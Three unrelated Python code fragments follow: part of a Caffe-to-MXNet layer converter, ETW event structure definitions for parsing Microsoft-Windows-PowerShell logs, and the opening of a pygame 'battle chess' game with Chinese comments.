param_string = "p=%f" % param.dropout_ratio
need_flatten[name] = need_flatten[mapping[layer[i].bottom[0]]]
if layer[i].type == 'Softmax' or layer[i].type == 20:
if layer[i].softmax_param.axis == 2:
symbol_string += "%s = mx.symbol.transpose(%s, axes=(0,2,1))\n" %\
(mapping[layer[i].bottom[0]], mapping[layer[i].bottom[0]])
type_string = 'mx.symbol.SoftmaxActivation'
param_string = "mode='channel'"
need_flatten[name] = False
else:
type_string = 'mx.symbol.SoftmaxOutput'
if layer[i].type == 'Flatten' or layer[i].type == 8:
if 'softmax' in layer[i].bottom[0]:
type_string = 'identical'
else:
type_string = 'mx.symbol.Flatten'
need_flatten[name] = False
if layer[i].type == 'Split' or layer[i].type == 22:
type_string = 'split'
if layer[i].type == 'Concat' or layer[i].type == 3:
type_string = 'mx.symbol.Concat'
need_flatten[name] = True
if layer[i].type == 'Crop':
type_string = 'mx.symbol.Crop'
need_flatten[name] = True
param_string = 'center_crop=True'
if layer[i].type == 'BatchNorm':
type_string = 'mx.symbol.BatchNorm'
param = layer[i].batch_norm_param
param_string = 'use_global_stats=%s' % param.use_global_stats
if layer[i].type == 'PReLU':
type_string = 'mx.symbol.LeakyReLU'
param = layer[i].prelu_param
param_string = "act_type='prelu', slope=%f" % param.filler.value
need_flatten[name] = need_flatten[mapping[layer[i].bottom[0]]]
if layer[i].type == 'Normalize':
bottom = re.sub('[-/]', '_', layer[i].bottom[0])
conv_layer = find_layer(layer, bottom)
assert conv_layer is not None
param = layer[i].norm_param
assert not param.across_spatial and not param.channel_shared
assert param.scale_filler.type == 'constant'
if conv_layer.type == 'Convolution':
scale_name = "%s_scale" % name
symbol_string += "%s=mx.sym.Variable(name='%s', shape=(1, %d, 1, 1), init=mx.init.Constant(%f))\n" % \
(scale_name, scale_name, conv_layer.convolution_param.num_output,
param.scale_filler.value)
symbol_string += "%s=mx.symbol.L2Normalization(name='%s', data=%s, mode='channel')\n" %\
(name, name, mapping[layer[i].bottom[0]])
symbol_string += "%s=mx.symbol.broadcast_mul(lhs=%s, rhs=%s)\n" %\
(name, scale_name, name)
type_string = 'split'
need_flatten[name] = True
else:
raise ValueError('Unknown/Invalid normalize layer!')
if layer[i].type == 'Permute':
type_string = 'mx.symbol.transpose'
param_string = "axes=(%s)" % (','.join([str(x) for x in layer[i].permute_param.order]))
need_flatten[name] = True
from_name = ''
if layer[i].type == 'PriorBox':
param = layer[i].prior_box_param
if layer[i].bottom[0] == 'data':
bottom_order = [1]
else:
bottom_order = [0]
try:
min_size = param.min_size[0] / input_dim[2]
max_size = math.sqrt(param.min_size[0] * param.max_size[0]) / input_dim[2]
sizes = '(%f, %f)' %(min_size, max_size)
except AttributeError:
min_size = param.min_size[0] / input_dim[2]
sizes = '(%f)' %(min_size)
ars = list(param.aspect_ratio)
ratios = [1.]
for ar in ars:
ratios.append(ar)
if param.flip:
ratios.append(1. / ar)
ratios_string = '(' + ','.join(str(x) for x in ratios) + ')'
clip = param.clip
if (param.step_h > 0 or param.step_w > 0):
step_h = param.step_h
step_w = param.step_w
elif param.step > 0:
step_h = param.step
step_w = param.step
else:
step_h = -1
step_w = -1
finput_dim = float(input_dim[2])
step = '(%f, %f)' % (step_h / finput_dim, step_w / finput_dim)
assert param.offset == 0.5, "currently only support offset = 0.5"
symbol_string += '%s = mx.contrib.symbol.MultiBoxPrior(%s, sizes=%s, ratios=%s, clip=%s, steps=%s, name="%s")\n' % \
(name, mapping[layer[i].bottom[0]], sizes, ratios_string, clip, step, name)
symbol_string += '%s = mx.symbol.Flatten(data=%s)\n' % (name, name)
type_string = 'split'
need_flatten[name] = False
if layer[i].type == 'Reshape':
type_string = 'mx.symbol.Reshape'
param = layer[i].reshape_param
param_string = 'shape=(' + ','.join([str(x) for x in list(param.shape.dim)]) + ')'
need_flatten[name] = True
if layer[i].type == 'DetectionOutput':
bottom_order = [1, 0, 2]
param = layer[i].detection_output_param
assert param.share_location == True
assert param.background_label_id == 0
nms_param = param.nms_param
type_string = 'mx.contrib.symbol.MultiBoxDetection'
param_string = "nms_threshold=%f, nms_topk=%d" % \
(nms_param.nms_threshold, nms_param.top_k)
if type_string == '':
raise Exception('Unknown Layer %s!' % layer[i].type)
if type_string == 'identical':
bottom = layer[i].bottom
symbol_string += "%s = %s\n" % (name, mapping[bottom[0]])
elif type_string != 'split':
bottom = layer[i].bottom
if param_string != "":
param_string = ", " + param_string
if len(bottom) == 1:
if need_flatten[mapping[bottom[0]]] and type_string == 'mx.symbol.FullyConnected':
flatten_name = "flatten_%d" % flatten_count
symbol_string += "%s=mx.symbol.Flatten(name='%s', data=%s)\n" % \
(flatten_name, flatten_name, mapping[bottom[0]])
flatten_count += 1
need_flatten[flatten_name] = False
bottom[0] = flatten_name
mapping[bottom[0]] = bottom[0]
symbol_string += "%s = %s(%s%s %s, name='%s')\n" % \
(name, type_string, from_name, mapping[bottom[0]], param_string, name)
else:
if not bottom_order:
bottom_order = range(len(bottom))
symbol_string += "%s = %s(name='%s', *[%s] %s)\n" % \
(name, type_string, name, ','.join([mapping[bottom[x]] for x in bottom_order]), param_string)
if layer[i].type == 'Concat' and layer[i].concat_param.axis == 2:
symbol_string += "%s = mx.symbol.Reshape(data=%s, shape=(0, -1, 4), name='%s')\n" %\
(name, name, name)
for j in range(len(layer[i].top)):
mapping[layer[i].top[j]] = name
output_name = name
return symbol_string, output_name, | |
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-PowerShell
GUID : a0c1853b-5c40-4b15-8766-3cf1c58f985a
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4100, version=1)
class Microsoft_Windows_PowerShell_4100_1(Etw):
pattern = Struct(
"ContextInfo" / WString,
"UserData" / WString,
"Payload" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4101, version=1)
class Microsoft_Windows_PowerShell_4101_1(Etw):
pattern = Struct(
"ContextInfo" / WString,
"UserData" / WString,
"Payload" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4102, version=1)
class Microsoft_Windows_PowerShell_4102_1(Etw):
pattern = Struct(
"ContextInfo" / WString,
"UserData" / WString,
"Payload" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4103, version=1)
class Microsoft_Windows_PowerShell_4103_1(Etw):
pattern = Struct(
"ContextInfo" / WString,
"UserData" / WString,
"Payload" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4104, version=1)
class Microsoft_Windows_PowerShell_4104_1(Etw):
pattern = Struct(
"MessageNumber" / Int32sl,
"MessageTotal" / Int32sl,
"ScriptBlockText" / WString,
"ScriptBlockId" / WString,
"Path" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4105, version=1)
class Microsoft_Windows_PowerShell_4105_1(Etw):
pattern = Struct(
"ScriptBlockId" / WString,
"RunspaceId" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=4106, version=1)
class Microsoft_Windows_PowerShell_4106_1(Etw):
pattern = Struct(
"ScriptBlockId" / WString,
"RunspaceId" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7937, version=1)
class Microsoft_Windows_PowerShell_7937_1(Etw):
pattern = Struct(
"ContextInfo" / WString,
"UserData" / WString,
"Payload" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7938, version=1)
class Microsoft_Windows_PowerShell_7938_1(Etw):
pattern = Struct(
"ContextInfo" / WString,
"UserData" / WString,
"Payload" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7939, version=1)
class Microsoft_Windows_PowerShell_7939_1(Etw):
pattern = Struct(
"ContextInfo" / WString,
"UserData" / WString,
"Payload" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7940, version=1)
class Microsoft_Windows_PowerShell_7940_1(Etw):
pattern = Struct(
"ContextInfo" / WString,
"UserData" / WString,
"Payload" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7941, version=1)
class Microsoft_Windows_PowerShell_7941_1(Etw):
pattern = Struct(
"currentActivityId" / Guid,
"parentActivityId" / Guid
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=7942, version=1)
class Microsoft_Windows_PowerShell_7942_1(Etw):
pattern = Struct(
"ClassName" / WString,
"MethodName" / WString,
"WorkflowGuid" / WString,
"Message" / WString,
"JobData" / WString,
"ActivityName" / WString,
"ActivityGuid" / WString,
"Parameters" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=8193, version=1)
class Microsoft_Windows_PowerShell_8193_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=8194, version=1)
class Microsoft_Windows_PowerShell_8194_1(Etw):
pattern = Struct(
"InstanceId" / WString,
"MaxRunspaces" / WString,
"MinRunspaces" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=8197, version=1)
class Microsoft_Windows_PowerShell_8197_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=8198, version=1)
class Microsoft_Windows_PowerShell_8198_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString,
"param3" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=12033, version=1)
class Microsoft_Windows_PowerShell_12033_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=12034, version=1)
class Microsoft_Windows_PowerShell_12034_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=12035, version=1)
class Microsoft_Windows_PowerShell_12035_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=12036, version=1)
class Microsoft_Windows_PowerShell_12036_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=12038, version=1)
class Microsoft_Windows_PowerShell_12038_1(Etw):
pattern = Struct(
"uri" / WString,
"shell" / WString,
"userName" / WString,
"opentimeout" / WString,
"idletimeout" / WString,
"canceltimeout" / WString,
"auth" / Int32ul,
"thumbPrint" / WString,
"redircount" / WString,
"recvdDataSize" / WString,
"recvdObjSize" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24577, version=1)
class Microsoft_Windows_PowerShell_24577_1(Etw):
pattern = Struct(
"FileName" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24578, version=1)
class Microsoft_Windows_PowerShell_24578_1(Etw):
pattern = Struct(
"FileName" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24595, version=1)
class Microsoft_Windows_PowerShell_24595_1(Etw):
pattern = Struct(
"CurrentLine" / Int32sl,
"FileName" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24596, version=1)
class Microsoft_Windows_PowerShell_24596_1(Etw):
pattern = Struct(
"CurrentLine" / Int32sl,
"FileName" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24597, version=1)
class Microsoft_Windows_PowerShell_24597_1(Etw):
pattern = Struct(
"CurrentLine" / Int32sl,
"FileName" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24598, version=1)
class Microsoft_Windows_PowerShell_24598_1(Etw):
pattern = Struct(
"CurrentLine" / Int32sl,
"FileName" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=24599, version=1)
class Microsoft_Windows_PowerShell_24599_1(Etw):
pattern = Struct(
"CurrentLine" / Int32sl,
"FileName" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28673, version=1)
class Microsoft_Windows_PowerShell_28673_1(Etw):
pattern = Struct(
"DeserializedType" / WString,
"CastedToType" / WString,
"RehydratedType" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28674, version=1)
class Microsoft_Windows_PowerShell_28674_1(Etw):
pattern = Struct(
"DeserializedType" / WString,
"CastedToType" / WString,
"TypeCastException" / WString,
"TypeCastInnerException" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28675, version=1)
class Microsoft_Windows_PowerShell_28675_1(Etw):
pattern = Struct(
"SerializedType" / WString,
"OriginalDepth" / Int32sl,
"OverridenDepth" / Int32sl,
"CurrentDepthBelowTopLevel" / Int32sl
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28676, version=1)
class Microsoft_Windows_PowerShell_28676_1(Etw):
pattern = Struct(
"SerializedType" / WString,
"OverridenMode" / Int32ul
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28677, version=1)
class Microsoft_Windows_PowerShell_28677_1(Etw):
pattern = Struct(
"PropertyName" / WString,
"PropertyOwnerType" / WString,
"GetterScript" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28678, version=1)
class Microsoft_Windows_PowerShell_28678_1(Etw):
pattern = Struct(
"PropertyName" / WString,
"PropertyOwnerType" / WString,
"Exception" / WString,
"InnerException" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28679, version=1)
class Microsoft_Windows_PowerShell_28679_1(Etw):
pattern = Struct(
"TypeBeingEnumerated" / WString,
"Exception" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28680, version=1)
class Microsoft_Windows_PowerShell_28680_1(Etw):
pattern = Struct(
"Type" / WString,
"Exception" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28682, version=1)
class Microsoft_Windows_PowerShell_28682_1(Etw):
pattern = Struct(
"TypeOfObjectAtMaxDepth" / WString,
"PropertyNameAtMaxDepth" / WString,
"Depth" / Int32sl
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28683, version=1)
class Microsoft_Windows_PowerShell_28683_1(Etw):
pattern = Struct(
"LineNumber" / Int32sl,
"LinePosition" / Int32sl,
"Exception" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=28684, version=1)
class Microsoft_Windows_PowerShell_28684_1(Etw):
pattern = Struct(
"TypeOfObjectWithMissingProperty" / WString,
"PropertyName" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32769, version=1)
class Microsoft_Windows_PowerShell_32769_1(Etw):
pattern = Struct(
"Runspace_InstanceId" / WString,
"PowerShell_InstanceId" / WString,
"Destination" / Int32ul,
"DataType" / Int32ul,
"TargetInterface" / Int32ul
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32775, version=1)
class Microsoft_Windows_PowerShell_32775_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString,
"param3" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32776, version=1)
class Microsoft_Windows_PowerShell_32776_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString,
"ErrorCode" / WString,
"ErrorMessage" / WString,
"StackTrace" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32777, version=1)
class Microsoft_Windows_PowerShell_32777_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString,
"param3" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32784, version=1)
class Microsoft_Windows_PowerShell_32784_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString,
"ErrorCode" / WString,
"ErrorMessage" / WString,
"StackTrace" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32785, version=1)
class Microsoft_Windows_PowerShell_32785_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32786, version=1)
class Microsoft_Windows_PowerShell_32786_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32787, version=1)
class Microsoft_Windows_PowerShell_32787_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32788, version=1)
class Microsoft_Windows_PowerShell_32788_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32789, version=1)
class Microsoft_Windows_PowerShell_32789_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString,
"DataSize" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32790, version=1)
class Microsoft_Windows_PowerShell_32790_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32791, version=1)
class Microsoft_Windows_PowerShell_32791_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32792, version=1)
class Microsoft_Windows_PowerShell_32792_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString,
"DataSize" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32793, version=1)
class Microsoft_Windows_PowerShell_32793_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32800, version=1)
class Microsoft_Windows_PowerShell_32800_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32801, version=1)
class Microsoft_Windows_PowerShell_32801_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32802, version=1)
class Microsoft_Windows_PowerShell_32802_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32803, version=1)
class Microsoft_Windows_PowerShell_32803_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString,
"SignalCode" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32804, version=1)
class Microsoft_Windows_PowerShell_32804_1(Etw):
pattern = Struct(
"SessionId" / WString,
"PipelineId" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32805, version=1)
class Microsoft_Windows_PowerShell_32805_1(Etw):
pattern = Struct(
"SessionId" / WString,
"Uri" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32849, version=1)
class Microsoft_Windows_PowerShell_32849_1(Etw):
pattern = Struct(
"Runspace_InstanceId" / WString,
"PowerShell_InstanceId" / WString,
"DataSize" / WString,
"DataType" / Int32ul,
"TargetInterface" / Int32ul
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32850, version=1)
class Microsoft_Windows_PowerShell_32850_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString,
"param3" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32851, version=1)
class Microsoft_Windows_PowerShell_32851_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32852, version=1)
class Microsoft_Windows_PowerShell_32852_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString,
"param3" / WString,
"param4" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32853, version=1)
class Microsoft_Windows_PowerShell_32853_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32854, version=1)
class Microsoft_Windows_PowerShell_32854_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString,
"param3" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32855, version=1)
class Microsoft_Windows_PowerShell_32855_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString,
"param3" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32856, version=1)
class Microsoft_Windows_PowerShell_32856_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString,
"param3" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32857, version=1)
class Microsoft_Windows_PowerShell_32857_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString,
"param3" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32865, version=1)
class Microsoft_Windows_PowerShell_32865_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32866, version=1)
class Microsoft_Windows_PowerShell_32866_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32867, version=1)
class Microsoft_Windows_PowerShell_32867_1(Etw):
pattern = Struct(
"ObjectId" / Int64sl,
"FragmentId" / Int64sl,
"sFlag" / Int32sl,
"eFlag" / Int32sl,
"FragmentLength" / Int32ul,
"FragmentPayload" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=32868, version=1)
class Microsoft_Windows_PowerShell_32868_1(Etw):
pattern = Struct(
"ObjectId" / Int64sl,
"FragmentId" / Int64sl,
"sFlag" / Int32sl,
"eFlag" / Int32sl,
"FragmentLength" / Int32ul,
"FragmentPayload" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=45057, version=1)
class Microsoft_Windows_PowerShell_45057_1(Etw):
pattern = Struct(
"Message" / WString,
"Category" / WString,
"Reason" / WString,
"TargetName" / WString,
"FullyQualifiedErrorId" / WString,
"ExceptionMessage" / WString,
"ExceptionStackTrace" / WString,
"ExceptionInnerException" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=45058, version=1)
class Microsoft_Windows_PowerShell_45058_1(Etw):
pattern = Struct(
"param1" / WString,
"param2" / WString,
"param3" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=45060, version=1)
class Microsoft_Windows_PowerShell_45060_1(Etw):
pattern = Struct(
"Id" / WString,
"InstanceId" / WString,
"Name" / WString,
"Location" / WString,
"State" / WString,
"Command" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=45061, version=1)
class Microsoft_Windows_PowerShell_45061_1(Etw):
pattern = Struct(
"param1" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), event_id=45062, version=1)
class Microsoft_Windows_PowerShell_45062_1(Etw):
pattern = Struct(
"uri" / WString,
"shell" / WString,
"userName" / WString,
"opentimeout" / WString,
"idletimeout" / WString,
"canceltimeout" / WString,
"auth" / Int32ul,
"thumbPrint" / WString,
"redircount" / WString,
"recvdDataSize" / WString,
"recvdObjSize" / WString
)
@declare(guid=guid("a0c1853b-5c40-4b15-8766-3cf1c58f985a"), | |
<filename>battlechess/game.py
# -*- coding: utf-8 -*-
'''
@name: game
@author: Memory&Xinxin
@date: 2019/11/14
@document: 皇家战棋游戏的主要文件
'''
import time
import pygame
from random import choice
from .base import BaseGame, Button, Chess
from .utils import *
from .configs import *
class BeginGame(BaseGame):
"""游戏开始选择的画面和逻辑处理"""
def __init__(self, factory, user, offline=False):
super(BeginGame, self).__init__(WINDOW_TITILE, WINDOW_SIZE)
pygame.display.set_icon(get_surface('icon'))
self.factory = factory
self.user = user
self.offline = offline
self.state = 'start'
self.load_src()
self.init_buttons()
def load_src(self):
'''
载入所需的资源。
'''
self.img_bg = get_surface('bg')
self.img_trans_bg = get_surface('trans_bg')
self.img_begin = get_surface('begin')
self.img_match = surface_clip_by_col(get_surface('match'), 2)
self.img_button_cancel = surface_clip_by_row(get_surface('button_cancel'), 2)
self.img_button_mode = surface_clip(get_surface('button_mode'), 2, 2, 'col')
def init_buttons(self):
def local(button):
self.begin('local')
def match(button):
if not self.lose_connection() and self.user:
data = {'type': 'match', 'name': self.user['name']}
self.sendata(data)
self.state = 'match'
self.start_wait(self.img_match[0], self.buttons['cancel'])
else:
self.start_wait(self.img_wait[1][3], self.buttons['cancel'])
def cancel(button):
if self.state == 'match':
data = {'type': 'unmatch', 'name': self.user['name']}
self.sendata(data)
button.set_visible(False)
self.state = 'start'
self.stop_wait()
self.buttons['loacl'] = Button(self.screen, (300, 500), self.img_button_mode[0][0],
'local', self.img_button_mode[0][1], local)
self.buttons['match'] = Button(self.screen, (555, 500), self.img_button_mode[1][0],
'match', self.img_button_mode[1][1], match)
self.buttons['cancel'] = Button(self.screen, (445, 300), self.img_button_cancel[0],
'local', self.img_button_cancel[1], cancel, False)
def begin(self, mode, data=None):
uninstall_game()
game = BattleChess(self.factory, self.user, mode, data)
self.state = None
install_game(game)
def update(self):
if self.state == 'start':
self.buttons['loacl'].set_click(True)
if self.offline:
self.buttons['match'].set_click(False)
else:
self.buttons['match'].set_click(True)
elif self.state == 'match':
datas = self.get_datas()
for data in datas:
if data and data['type'] == 'init':
self.begin('online', data)
def draw(self):
self.screen.blit(self.img_bg, (0, 0))
self.screen.blit(self.img_begin, (0, 0))
for button in self.buttons.values():
button.draw()
class BattleChess(BaseGame):
"""战棋的主类"""
def __init__(self, factory, user, mode, data='None'):
super(BattleChess, self).__init__(WINDOW_TITILE, WINDOW_SIZE)
pygame.display.set_icon(get_surface('icon')) # 设置窗口图标
self.factory = factory # 网络连接的工厂,用来获取服务器传来的数据
self.my_user = user # 用户
self.mode = mode # 游戏模式,local 或者 online
self.offline = user is None
self.init_param() # 初始化参数
self.load_src() # 载入资源
self.init_game(data) # 初始化游戏
self.init_head() # 初始化头像框
self.init_button() # 初始化按钮
self.bind_click(1, self.click) # 绑定鼠标左键点击事件
self.start_time = time.time() # 开始计时
@property
def local(self):
return self.mode == 'local'
@property
def online(self):
return self.mode == 'online'
@property
def my_turn(self):
return self.turn == self.my_color
@property
def enemy_color(self):
if self.my_color == 'red':
return 'blue'
return 'red'
def init_param(self):
'''
参数的初始化。
'''
self.start = False # 游戏是否开始
self.start_time = -1 # 上一步操作的时间
self.wait_end = False # 是否结束游戏,进入等待退出的界面
self.timeout = {'red': 0, 'blue': 0} # 双方超时的次数
self.no_eat = 0 # 多少步没有吃子或者翻开棋子
self.step = 0 # 目前走的总步数
# 棋盘相关的参数
self.select = (-1, -1) # 选中的棋盘格子的位置,(-1, -1)表示无选中
self.last_step = None # 记录上一步的操作,如果是翻开棋子,记录位置,如果是移动,记录前后的位置
self.next_list = [] # 选中的棋子下一步可走的地方
self.cb_color = [[None for i in range(ROW)] for j in range(ROW)] # 每个格子的颜色
self.chess_left = {'red': 18, 'blue': 18, None: 0} # 红蓝双方剩下的棋子
self.chess = [[None for i in range(ROW)] for j in range(ROW)] # 所有的棋子
# 资源相关的参数,具体见 load_scr() 函数的说明
self.img_unopen = []
self.img_red_chess = [[[None, None] for i in range(ROW)] for j in range(ROW)]
self.img_blue_chess = [[[None, None] for i in range(ROW)] for j in range(ROW)]
def load_src(self):
'''
加载资源文件。
self.img_unopen 是未被翻开时的棋子图像,共有6个尺寸。
self.img_red_chess 存储红方棋子的图像,self.img_red_chess[i][j][k]含义如下:
i: 0~5,分别表示:国王,将军,骑士,弓箭手,禁卫军,刺客
j: 0~5,表示从上往下数第j层的棋子图像(因为每一层的尺寸不一样)
k: 0: 棋子面向左边,1: 棋子面向右边。
img_blue_chess 同上。
'''
img_unopen = get_surface('unopen')
img_chess = get_surface('chess')
self.img_red_head = get_surface('head_red')
self.img_blue_head = get_surface('head_blue')
self.img_bg = get_surface('bg')
self.img_time = get_surface('time')
self.img_button_ok = surface_clip_by_row(get_surface('button_ok'), 2)
